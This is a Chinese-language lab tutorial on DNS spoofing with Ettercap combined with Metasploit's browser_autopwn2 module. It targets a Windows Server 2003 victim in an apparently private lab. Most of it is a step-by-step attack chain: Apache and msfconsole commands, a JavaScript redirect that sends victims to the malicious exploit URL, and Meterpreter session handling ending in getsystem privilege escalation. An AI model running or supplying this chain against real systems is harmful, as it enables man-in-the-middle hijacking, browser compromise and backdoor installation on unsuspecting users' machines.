'使用Ettercap和MSF模块进行DNS欺骗,并植入后门'

1.工具介绍

1.1Ettercap

Ettercap是一个全面中间人攻击工具。它具有实时连接嗅探、动态内容过滤和许多其他有趣的功能。它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性。

1.2MSF模块:browser_autopwn2

browser_autopwn2是Metasploit提供的辅助功能模块。在受害者访问Web页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn2能够检测用户使用的浏览器类型, browser_autopwn2将根据浏览器的检测结果,自行选择最合适的EXP。

2.实验环境

角色 系统版本 IP 备注
靶机 Windows Server 2003 192.168.126.149
攻击机 Kali Linux 64 bit 2019.1a 192.168.126.126

3.实验过程

3.1使用Ettercap进行DNS欺骗

DNS欺骗过程和使用Ettercap和SET进行DNS欺骗、钓鱼过程相同,可以查看这篇文章。
注意:进行DNS欺骗后,要开启Apache2服务才可以正常访问。上一篇中,SET自动开启了80端口,所以不需要开启Apache2服务。
开启Apache2服务命令

1
2
/etc/init.d/apache2 start
/etc/init.d/apache2 status

3.2MSF模块生成恶意URL

1
2
3
4
5
6
/etc/init.d/postgresql start
msfdb init
msfconsole
search browser_autopwn2
use auxiliary/server/browser_autopwn2
run

没有什么需要修改的设置,使用模块之后,直接run就可以生成恶意URL了

3.3添加跳转脚本

生成URL过程比较慢,这段时间我们给主页添加跳转脚本

1
2
3
4
<script language="javascript" type="text/javascript"> 
// 以下方式定时跳转
setTimeout("javascript:location.href='Hello!'", 1000);
</script>

将上方代码中的Hello!替换为MSF生成的恶意URL即可。

3.4靶机访问

访问www.baidu.com,可以看到访问的是刚刚写的index.html

自动跳转到恶意URL

3.5测试结果

在靶机访问恶意URL之后,MSF开始根据浏览器版本选择使用EXP并创建会话

3.6启动会话

MSF创建会话之后,我们需要手动启用会话

1
sessions -l

1
sessions -i 1

1
2
3
getuid
getsystem
getuid

4.参考

[1] MSF自动化浏览器攻击与后门安装